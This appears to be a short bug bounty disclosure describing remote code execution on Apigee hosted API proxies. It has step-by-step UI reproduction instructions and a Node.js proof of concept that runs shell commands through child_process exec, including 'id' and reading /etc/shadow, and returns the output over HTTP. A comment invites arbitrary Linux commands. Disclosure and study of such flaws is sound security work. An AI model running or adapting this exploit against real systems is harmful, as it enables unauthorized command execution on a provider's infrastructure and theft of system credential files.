Summary: RCE on Apigee API proxies
Steps to reproduce:
1.- open apigee.com login in with your account
2.- navigate to Develop > API proxies and click “+Proxy” button
3.- select hosted target: – put any name (in this case “rce”) – select “Quick start” radio button and the “Next” button – then “Next” again, and “Next” one more time – – check “prod” checkbox and clic “Create and Deploy” Button – after the deploy, copy the url and clic on “Edit proxy”
4.- select “Develop” tab, then clic the “index.js” file in “Resources > hosted” section, and replace the content of that file with and clic on “Save” and “Save” one more time:
var http = require('http');
const { exec } = require('child_process');
var svr = http.createServer(function(req, resp) {
resp.setHeader('Content-Type', 'application/json');
// you can put any linux command in exec function
exec('echo "- - - - id - - - -";id; echo ;echo "- cat /etc/shadow - ";cat /etc/shadow' ,
(error, stdout, stderr) => {
resp.end(stdout + '\npoc by @omespino');
}
);
});
svr.listen(process.env.PORT || 3000, function() {});